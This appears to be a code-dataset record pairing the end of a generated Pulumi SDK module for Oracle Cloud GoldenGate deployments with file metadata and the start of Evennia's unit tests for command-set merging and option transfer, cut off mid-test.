:param pulumi.Input[str] lifecycle_details: Describes the object's current state in detail. For example, it can be used to provide actionable information for a resource in a Failed state.
:param pulumi.Input[Sequence[pulumi.Input[str]]] nsg_ids: (Updatable) An array of [Network Security Group](https://docs.cloud.oracle.com/iaas/Content/Network/Concepts/networksecuritygroups.htm) OCIDs used to define network access for a deployment.
:param pulumi.Input[pulumi.InputType['DeploymentOggDataArgs']] ogg_data: (Updatable) Deployment Data for creating an OggDeployment
:param pulumi.Input[str] private_ip_address: The private IP address in the customer's VCN representing the access point for the associated endpoint service in the GoldenGate service VCN.
:param pulumi.Input[str] public_ip_address: The public IP address representing the access point for the Deployment.
:param pulumi.Input[str] state: Possible lifecycle states.
:param pulumi.Input[str] subnet_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the subnet being referenced.
:param pulumi.Input[Mapping[str, Any]] system_tags: The system tags associated with this resource, if any. The system tags are set by Oracle Cloud Infrastructure services. Each key is predefined and scoped to namespaces. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{orcl-cloud: {free-tier-retain: true}}`
:param pulumi.Input[str] time_created: The time the resource was created. The format is defined by [RFC3339](https://tools.ietf.org/html/rfc3339), such as `2016-08-25T21:10:29.600Z`.
:param pulumi.Input[str] time_updated: The time the resource was last updated. The format is defined by [RFC3339](https://tools.ietf.org/html/rfc3339), such as `2016-08-25T21:10:29.600Z`.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _DeploymentState.__new__(_DeploymentState)
__props__.__dict__["compartment_id"] = compartment_id
__props__.__dict__["cpu_core_count"] = cpu_core_count
__props__.__dict__["defined_tags"] = defined_tags
__props__.__dict__["deployment_backup_id"] = deployment_backup_id
__props__.__dict__["deployment_type"] = deployment_type
__props__.__dict__["deployment_url"] = deployment_url
__props__.__dict__["description"] = description
__props__.__dict__["display_name"] = display_name
__props__.__dict__["fqdn"] = fqdn
__props__.__dict__["freeform_tags"] = freeform_tags
__props__.__dict__["is_auto_scaling_enabled"] = is_auto_scaling_enabled
__props__.__dict__["is_healthy"] = is_healthy
__props__.__dict__["is_latest_version"] = is_latest_version
__props__.__dict__["is_public"] = is_public
__props__.__dict__["license_model"] = license_model
__props__.__dict__["lifecycle_details"] = lifecycle_details
__props__.__dict__["nsg_ids"] = nsg_ids
__props__.__dict__["ogg_data"] = ogg_data
__props__.__dict__["private_ip_address"] = private_ip_address
__props__.__dict__["public_ip_address"] = public_ip_address
__props__.__dict__["state"] = state
__props__.__dict__["subnet_id"] = subnet_id
__props__.__dict__["system_tags"] = system_tags
__props__.__dict__["time_created"] = time_created
__props__.__dict__["time_updated"] = time_updated
return Deployment(resource_name, opts=opts, __props__=__props__)
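    # --- Hedged usage sketch (illustrative only, not part of the generated SDK) ---
    # Rehydrating an existing Deployment through the static `get` defined above.
    # The package/module import path is an assumption; adjust it to wherever this
    # provider module actually lives. The OCID below is hypothetical.
    #
    #   import pulumi
    #   import pulumi_oci as oci  # assumed package name
    #
    #   existing = oci.golden_gate.Deployment.get(
    #       "imported-deployment",
    #       id="ocid1.goldengatedeployment.oc1..example",  # hypothetical OCID
    #   )
    #   pulumi.export("deployment_url", existing.deployment_url)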
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Output[str]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment being referenced.
"""
return pulumi.get(self, "compartment_id")
@property
@pulumi.getter(name="cpuCoreCount")
def cpu_core_count(self) -> pulumi.Output[int]:
"""
        (Updatable) The minimum number of OCPUs to be made available for this Deployment.
"""
return pulumi.get(self, "cpu_core_count")
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) Tags defined for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
"""
return pulumi.get(self, "defined_tags")
@property
@pulumi.getter(name="deploymentBackupId")
def deployment_backup_id(self) -> pulumi.Output[str]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the backup being referenced.
"""
return pulumi.get(self, "deployment_backup_id")
@property
@pulumi.getter(name="deploymentType")
def deployment_type(self) -> pulumi.Output[str]:
"""
The deployment type.
"""
return pulumi.get(self, "deployment_type")
@property
@pulumi.getter(name="deploymentUrl")
def deployment_url(self) -> pulumi.Output[str]:
"""
The URL of a resource.
"""
return pulumi.get(self, "deployment_url")
@property
@pulumi.getter
def description(self) -> pulumi.Output[str]:
"""
(Updatable) Metadata about this specific object.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[str]:
"""
(Updatable) An object's Display Name.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter
def fqdn(self) -> pulumi.Output[str]:
"""
(Updatable) A three-label Fully Qualified Domain Name (FQDN) for a resource.
"""
return pulumi.get(self, "fqdn")
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) A simple key-value pair that is applied without any predefined name, type, or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
"""
return pulumi.get(self, "freeform_tags")
@property
@pulumi.getter(name="isAutoScalingEnabled")
def is_auto_scaling_enabled(self) -> pulumi.Output[bool]:
"""
(Updatable) Indicates if auto scaling is enabled for the Deployment's CPU core count.
"""
return pulumi.get(self, "is_auto_scaling_enabled")
@property
@pulumi.getter(name="isHealthy")
def is_healthy(self) -> pulumi.Output[bool]:
"""
True if all of the aggregate resources are working correctly.
"""
return pulumi.get(self, "is_healthy")
@property
@pulumi.getter(name="isLatestVersion")
def is_latest_version(self) -> pulumi.Output[bool]:
"""
        Indicates if the resource is the latest available version.
"""
return pulumi.get(self, "is_latest_version")
@property
@pulumi.getter(name="isPublic")
def is_public(self) -> pulumi.Output[bool]:
"""
(Updatable) True if this object is publicly available.
"""
return pulumi.get(self, "is_public")
@property
@pulumi.getter(name="licenseModel")
def license_model(self) -> pulumi.Output[str]:
"""
(Updatable) The Oracle license model that applies to a Deployment.
"""
return pulumi.get(self, "license_model")
@property
@pulumi.getter(name="lifecycleDetails")
def lifecycle_details(self) -> pulumi.Output[str]:
"""
Describes the object's current state in detail. For example, it can be used to provide actionable information for a resource in a Failed state.
"""
return pulumi.get(self, "lifecycle_details")
@property
@pulumi.getter(name="nsgIds")
def nsg_ids(self) -> pulumi.Output[Sequence[str]]:
"""
(Updatable) An array of [Network Security Group](https://docs.cloud.oracle.com/iaas/Content/Network/Concepts/networksecuritygroups.htm) OCIDs used to define network access for a deployment.
"""
return pulumi.get(self, "nsg_ids")
@property
@pulumi.getter(name="oggData")
def ogg_data(self) -> pulumi.Output['outputs.DeploymentOggData']:
"""
(Updatable) Deployment Data for creating an OggDeployment
"""
return pulumi.get(self, "ogg_data")
@property
@pulumi.getter(name="privateIpAddress")
def private_ip_address(self) -> pulumi.Output[str]:
"""
The private IP address in the customer's VCN representing the access point for the associated endpoint service in the GoldenGate service VCN.
"""
return pulumi.get(self, "private_ip_address")
@property
@pulumi.getter(name="publicIpAddress")
def public_ip_address(self) -> pulumi.Output[str]:
"""
The public IP address representing the access point for the Deployment.
"""
return pulumi.get(self, "public_ip_address")
@property
@pulumi.getter
def state(self) -> pulumi.Output[str]:
"""
Possible lifecycle states.
"""
return pulumi.get(self, "state")
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> pulumi.Output[str]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the subnet being referenced.
"""
return pulumi.get(self, "subnet_id")
@property
@pulumi.getter(name="systemTags")
def system_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
The system tags associated with this resource, if any. The system tags are set by Oracle Cloud Infrastructure services. Each key is predefined and scoped to namespaces. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{orcl-cloud: {free-tier-retain: true}}`
"""
return pulumi.get(self, "system_tags")
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> pulumi.Output[str]:
"""
The time the resource was created. The format is defined by [RFC3339](https://tools.ietf.org/html/rfc3339), such as `2016-08-25T21:10:29.600Z`.
"""
return pulumi.get(self, "time_created")
@property
@pulumi.getter(name="timeUpdated")
def time_updated(self) -> pulumi.Output[str]:
"""
The time the resource was last updated. The format is defined by [RFC3339](https://tools.ietf.org/html/rfc3339), such as `2016-08-25T21:10:29.600Z`.
"""
return pulumi.get(self, "time_updated")
| 49.811659
| 400
| 0.666547
| 6,825
| 55,540
| 5.211868
| 0.044689
| 0.084113
| 0.063366
| 0.052571
| 0.930027
| 0.90616
| 0.891288
| 0.870175
| 0.854432
| 0.819966
| 0
| 0.004642
| 0.220346
| 55,540
| 1,114
| 401
| 49.856373
| 0.816821
| 0.353529
| 0
| 0.692996
| 1
| 0
| 0.11585
| 0.014395
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166915
| false
| 0.00149
| 0.010432
| 0
| 0.280179
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7698aba7811d59ab3c1731ddc2840d6eaae83577
| 45,237
|
py
|
Python
|
evennia/commands/tests.py
|
davidrideout/evennia
|
879eea55acdf4fe5cdc96ba8fd0ab5ccca4ae84b
|
[
"BSD-3-Clause"
] | null | null | null |
evennia/commands/tests.py
|
davidrideout/evennia
|
879eea55acdf4fe5cdc96ba8fd0ab5ccca4ae84b
|
[
"BSD-3-Clause"
] | null | null | null |
evennia/commands/tests.py
|
davidrideout/evennia
|
879eea55acdf4fe5cdc96ba8fd0ab5ccca4ae84b
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Unit testing for the Command system itself.
"""
from django.test import override_settings
from evennia.utils.test_resources import BaseEvenniaTest, TestCase
from evennia.commands.cmdset import CmdSet
from evennia.commands.command import Command
from evennia.commands import cmdparser
# Testing-command sets
class _CmdA(Command):
key = "A"
def __init__(self, cmdset, *args, **kwargs):
super().__init__(*args, **kwargs)
self.from_cmdset = cmdset
class _CmdB(Command):
key = "B"
def __init__(self, cmdset, *args, **kwargs):
super().__init__(*args, **kwargs)
self.from_cmdset = cmdset
class _CmdC(Command):
key = "C"
def __init__(self, cmdset, *args, **kwargs):
super().__init__(*args, **kwargs)
self.from_cmdset = cmdset
class _CmdD(Command):
key = "D"
def __init__(self, cmdset, *args, **kwargs):
super().__init__(*args, **kwargs)
self.from_cmdset = cmdset
class _CmdSetA(CmdSet):
key = "A"
def at_cmdset_creation(self):
self.add(_CmdA("A"))
self.add(_CmdB("A"))
self.add(_CmdC("A"))
self.add(_CmdD("A"))
class _CmdSetB(CmdSet):
key = "B"
def at_cmdset_creation(self):
self.add(_CmdA("B"))
self.add(_CmdB("B"))
self.add(_CmdC("B"))
class _CmdSetC(CmdSet):
key = "C"
def at_cmdset_creation(self):
self.add(_CmdA("C"))
self.add(_CmdB("C"))
class _CmdSetD(CmdSet):
key = "D"
def at_cmdset_creation(self):
self.add(_CmdA("D"))
self.add(_CmdB("D"))
self.add(_CmdC("D"))
self.add(_CmdD("D"))
# testing Command Sets
class TestCmdSetMergers(TestCase):
"Test merging of cmdsets"
def setUp(self):
super().setUp()
self.cmdset_a = _CmdSetA()
self.cmdset_b = _CmdSetB()
self.cmdset_c = _CmdSetC()
self.cmdset_d = _CmdSetD()
def test_union(self):
a, c = self.cmdset_a, self.cmdset_c
cmdset_f = a + c # same-prio
self.assertEqual(len(cmdset_f.commands), 4)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "A"), 2)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "C"), 2)
cmdset_f = c + a # same-prio, inverse order
self.assertEqual(len(cmdset_f.commands), 4)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "A"), 4)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "C"), 0)
a.priority = 1
cmdset_f = a + c # high prio A
self.assertEqual(len(cmdset_f.commands), 4)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "A"), 4)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "C"), 0)
def test_intersect(self):
a, c = self.cmdset_a, self.cmdset_c
a.mergetype = "Intersect"
cmdset_f = a + c # same-prio - c's Union kicks in
self.assertEqual(len(cmdset_f.commands), 4)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "A"), 2)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "C"), 2)
cmdset_f = c + a # same-prio - a's Intersect kicks in
self.assertEqual(len(cmdset_f.commands), 2)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "A"), 2)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "C"), 0)
a.priority = 1
cmdset_f = a + c # high prio A, intersect kicks in
self.assertEqual(len(cmdset_f.commands), 2)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "A"), 2)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "C"), 0)
def test_replace(self):
a, c = self.cmdset_a, self.cmdset_c
c.mergetype = "Replace"
cmdset_f = a + c # same-prio. C's Replace kicks in
self.assertEqual(len(cmdset_f.commands), 2)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "A"), 0)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "C"), 2)
cmdset_f = c + a # same-prio. A's Union kicks in
self.assertEqual(len(cmdset_f.commands), 4)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "A"), 4)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "C"), 0)
c.priority = 1
cmdset_f = c + a # c higher prio. C's Replace kicks in
self.assertEqual(len(cmdset_f.commands), 2)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "A"), 0)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "C"), 2)
def test_remove(self):
a, c = self.cmdset_a, self.cmdset_c
c.mergetype = "Remove"
cmdset_f = a + c # same-prio. C's Remove kicks in
self.assertEqual(len(cmdset_f.commands), 2)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "A"), 2)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "C"), 0)
cmdset_f = c + a # same-prio. A's Union kicks in
self.assertEqual(len(cmdset_f.commands), 4)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "A"), 4)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "C"), 0)
c.priority = 1
cmdset_f = c + a # c higher prio. C's Remove kicks in
self.assertEqual(len(cmdset_f.commands), 2)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "A"), 2)
self.assertEqual(sum(1 for cmd in cmdset_f.commands if cmd.from_cmdset == "C"), 0)
def test_order(self):
"Merge in reverse- and forward orders, same priorities"
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
cmdset_f = d + c + b + a # merge in reverse order of priority
self.assertEqual(cmdset_f.priority, 0)
self.assertEqual(cmdset_f.mergetype, "Union")
self.assertEqual(len(cmdset_f.commands), 4)
        self.assertTrue(all(cmd.from_cmdset == "A" for cmd in cmdset_f.commands))
cmdset_f = a + b + c + d # merge in order of priority
self.assertEqual(cmdset_f.priority, 0)
self.assertEqual(cmdset_f.mergetype, "Union")
self.assertEqual(len(cmdset_f.commands), 4) # duplicates setting from A transfers
        self.assertTrue(all(cmd.from_cmdset == "D" for cmd in cmdset_f.commands))
def test_priority_order(self):
"Merge in reverse- and forward order with well-defined prioritities"
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = 2
b.priority = 1
c.priority = 0
d.priority = -1
cmdset_f = d + c + b + a # merge in reverse order of priority
self.assertEqual(cmdset_f.priority, 2)
self.assertEqual(cmdset_f.mergetype, "Union")
self.assertEqual(len(cmdset_f.commands), 4)
        self.assertTrue(all(cmd.from_cmdset == "A" for cmd in cmdset_f.commands))
cmdset_f = a + b + c + d # merge in order of priority
self.assertEqual(cmdset_f.priority, 2)
self.assertEqual(cmdset_f.mergetype, "Union")
self.assertEqual(len(cmdset_f.commands), 4)
        self.assertTrue(all(cmd.from_cmdset == "A" for cmd in cmdset_f.commands))
class TestOptionTransferTrue(TestCase):
"""
Test cmdset-merge transfer of the cmdset-special options
(no_exits/channels/objs/duplicates etc)
cmdset A has all True options
"""
def setUp(self):
super().setUp()
self.cmdset_a = _CmdSetA()
self.cmdset_b = _CmdSetB()
self.cmdset_c = _CmdSetC()
self.cmdset_d = _CmdSetD()
self.cmdset_a.priority = 0
self.cmdset_b.priority = 0
self.cmdset_c.priority = 0
self.cmdset_d.priority = 0
self.cmdset_a.no_exits = True
self.cmdset_a.no_objs = True
self.cmdset_a.no_channels = True
self.cmdset_a.duplicates = True
def test_option_transfer__reverse_sameprio_passthrough(self):
"""
A has all True options, merges last (normal reverse merge), same prio.
The options should pass through to F since none of the other cmdsets
care to change the setting from their default None.
        Since A.duplicates = True, the final result is a union of duplicate
pairs (8 commands total).
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
cmdset_f = d + c + b + a # reverse, same-prio
self.assertTrue(cmdset_f.no_exits)
self.assertTrue(cmdset_f.no_objs)
self.assertTrue(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 8)
def test_option_transfer__forward_sameprio_passthrough(self):
"""
A has all True options, merges first (forward merge), same prio. This
        should pass those options through since the others all have options set
to None. The exception is `duplicates` since that is determined by
the two last mergers in the chain both being True.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
cmdset_f = a + b + c + d # forward, same-prio
self.assertTrue(cmdset_f.no_exits)
self.assertTrue(cmdset_f.no_objs)
self.assertTrue(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__reverse_highprio_passthrough(self):
"""
A has all True options, merges last (normal reverse merge) with the
highest prio. This should also pass through.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = 2
b.priority = 1
c.priority = 0
d.priority = -1
cmdset_f = d + c + b + a # reverse, A top priority
self.assertTrue(cmdset_f.no_exits)
self.assertTrue(cmdset_f.no_objs)
self.assertTrue(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__forward_highprio_passthrough(self):
"""
A has all True options, merges first (forward merge). This is a bit
synthetic since it will never happen in practice, but logic should
still make it pass through.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = 2
b.priority = 1
c.priority = 0
d.priority = -1
cmdset_f = a + b + c + d # forward, A top priority. This never happens in practice.
self.assertTrue(cmdset_f.no_exits)
self.assertTrue(cmdset_f.no_objs)
self.assertTrue(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__reverse_lowprio_passthrough(self):
"""
A has all True options, merges last (normal reverse merge) with the lowest
prio. This never happens (it would always merge first) but logic should hold
and pass through since the other cmdsets have None.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = -1
b.priority = 0
c.priority = 1
d.priority = 2
cmdset_f = d + c + b + a # reverse, A low prio. This never happens in practice.
self.assertTrue(cmdset_f.no_exits)
self.assertTrue(cmdset_f.no_objs)
self.assertTrue(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__forward_lowprio_passthrough(self):
"""
A has all True options, merges first (forward merge) with lowest prio. This
is the normal behavior for a low-prio cmdset. Passthrough should happen.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = -1
b.priority = 0
c.priority = 1
d.priority = 2
cmdset_f = a + b + c + d # forward, A low prio
self.assertTrue(cmdset_f.no_exits)
self.assertTrue(cmdset_f.no_objs)
self.assertTrue(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__reverse_highprio_block_passthrough(self):
"""
        A has all True options, the other cmdsets have False. A merges last with
        high prio. A should retain its option values and override the others.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = 2
b.priority = 1
c.priority = 0
d.priority = -1
c.no_exits = False
b.no_objs = False
d.duplicates = False
# higher-prio sets will change the option up the chain
cmdset_f = d + c + b + a # reverse, high prio
self.assertTrue(cmdset_f.no_exits)
self.assertTrue(cmdset_f.no_objs)
self.assertTrue(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__forward_highprio_block_passthrough(self):
"""
        A has all True options, the other cmdsets have False. A merges first
        (forward merge) with high prio. This situation should never happen, but
        the logic should hold: the highest prio's options should survive the merge.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = 2
b.priority = 1
c.priority = 0
d.priority = -1
c.no_exits = False
b.no_channels = False
b.no_objs = False
d.duplicates = False
# higher-prio sets will change the option up the chain
cmdset_f = a + b + c + d # forward, high prio, never happens
self.assertTrue(cmdset_f.no_exits)
self.assertTrue(cmdset_f.no_objs)
self.assertTrue(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__forward_lowprio_block(self):
"""
        A has all True options, the other cmdsets have False. A merges first
        (forward merge) with low prio. This should result in its values being
        blocked, coming out False.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = -1
b.priority = 0
c.priority = 1
d.priority = 2
c.no_exits = False
c.no_channels = False
b.no_objs = False
d.duplicates = False
# higher-prio sets will change the option up the chain
cmdset_f = a + b + c + d # forward, A low prio
self.assertFalse(cmdset_f.no_exits)
self.assertFalse(cmdset_f.no_objs)
self.assertFalse(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__forward_lowprio_block_partial(self):
"""
        A has all True options, the other cmdsets have False except C, which has
        None for `no_channels`. A merges first (forward merge) with low prio.
        This should result in its values being blocked and coming out False,
        except for no_channels which passes through.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = -1
b.priority = 0
c.priority = 1
d.priority = 2
c.no_exits = False
c.no_channels = None # passthrough
b.no_objs = False
d.duplicates = False
# higher-prio sets will change the option up the chain
cmdset_f = a + b + c + d # forward, A low prio
self.assertFalse(cmdset_f.no_exits)
self.assertFalse(cmdset_f.no_objs)
self.assertTrue(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__reverse_highprio_sameprio_order_last(self):
"""
A has all True options and highest prio, D has False and lowest prio,
others are passthrough. B has the same prio as A, with passthrough.
Since A is merged last, this should give prio to A's options
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = 2
b.priority = 2
c.priority = 0
d.priority = -1
d.no_channels = False
d.no_exits = False
d.no_objs = None
d.duplicates = False
# higher-prio sets will change the option up the chain
cmdset_f = d + c + b + a # reverse, A same prio, merged after b
self.assertTrue(cmdset_f.no_exits)
self.assertTrue(cmdset_f.no_objs)
self.assertTrue(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 8)
def test_option_transfer__reverse_highprio_sameprio_order_first(self):
"""
A has all True options and highest prio, D has False and lowest prio,
others are passthrough. B has the same prio as A, with passthrough.
While B, with None-values, is merged after A, A's options should have
replaced those of D at that point, and since B has passthrough the
final result should contain A's True options.
        Note that despite A having duplicates=True, there is no duplication in
        the DC + A merger since they have different priorities.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = 2
b.priority = 2
c.priority = 0
d.priority = -1
d.no_channels = False
d.no_exits = False
d.no_objs = False
d.duplicates = False
# higher-prio sets will change the option up the chain
cmdset_f = d + c + a + b # reverse, A same prio, merged before b
self.assertTrue(cmdset_f.no_exits)
self.assertTrue(cmdset_f.no_objs)
self.assertTrue(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__reverse_lowprio_block(self):
"""
        A has all True options, the other cmdsets have False. A merges last with
        low prio. This usually doesn't happen in practice (a low-prio cmdset
        would merge first), but the logic should hold and the low-prio cmdset's
        values should be blocked, coming out False.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = -1
b.priority = 0
c.priority = 1
d.priority = 2
c.no_exits = False
d.no_channels = False
b.no_objs = False
d.duplicates = False
# higher-prio sets will change the option up the chain
cmdset_f = d + c + b + a # reverse, A low prio, never happens
self.assertFalse(cmdset_f.no_exits)
self.assertFalse(cmdset_f.no_objs)
self.assertFalse(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
class TestOptionTransferFalse(TestCase):
"""
Test cmdset-merge transfer of the cmdset-special options
(no_exits/channels/objs/duplicates etc)
cmdset A has all False options
"""
def setUp(self):
super().setUp()
self.cmdset_a = _CmdSetA()
self.cmdset_b = _CmdSetB()
self.cmdset_c = _CmdSetC()
self.cmdset_d = _CmdSetD()
self.cmdset_a.priority = 0
self.cmdset_b.priority = 0
self.cmdset_c.priority = 0
self.cmdset_d.priority = 0
self.cmdset_a.no_exits = False
self.cmdset_a.no_objs = False
self.cmdset_a.no_channels = False
self.cmdset_a.duplicates = False
def test_option_transfer__reverse_sameprio_passthrough(self):
"""
A has all False options, merges last (normal reverse merge), same prio.
The options should pass through to F since none of the other cmdsets
care to change the setting from their default None.
Since A has duplicates=False, the result is a unique union of 4 cmds.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
cmdset_f = d + c + b + a # reverse, same-prio
self.assertFalse(cmdset_f.no_exits)
self.assertFalse(cmdset_f.no_objs)
self.assertFalse(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__forward_sameprio_passthrough(self):
"""
A has all False options, merges first (forward merge), same prio. This
        should pass those options through since the others all have options set
        to None. The exception is `duplicates` since that is determined by
        the two last mergers in the chain both being True.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
cmdset_f = a + b + c + d # forward, same-prio
self.assertFalse(cmdset_f.no_exits)
self.assertFalse(cmdset_f.no_objs)
self.assertFalse(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__reverse_highprio_passthrough(self):
"""
A has all False options, merges last (normal reverse merge) with the
highest prio. This should also pass through.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = 2
b.priority = 1
c.priority = 0
d.priority = -1
cmdset_f = d + c + b + a # reverse, A top priority
self.assertFalse(cmdset_f.no_exits)
self.assertFalse(cmdset_f.no_objs)
self.assertFalse(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__forward_highprio_passthrough(self):
"""
A has all False options, merges first (forward merge). This is a bit
synthetic since it will never happen in practice, but logic should
still make it pass through.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = 2
b.priority = 1
c.priority = 0
d.priority = -1
cmdset_f = a + b + c + d # forward, A top priority. This never happens in practice.
self.assertFalse(cmdset_f.no_exits)
self.assertFalse(cmdset_f.no_objs)
self.assertFalse(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__reverse_lowprio_passthrough(self):
"""
A has all False options, merges last (normal reverse merge) with the lowest
prio. This never happens (it would always merge first) but logic should hold
and pass through since the other cmdsets have None.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = -1
b.priority = 0
c.priority = 1
d.priority = 2
cmdset_f = d + c + b + a # reverse, A low prio. This never happens in practice.
self.assertFalse(cmdset_f.no_exits)
self.assertFalse(cmdset_f.no_objs)
self.assertFalse(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__forward_lowprio_passthrough(self):
"""
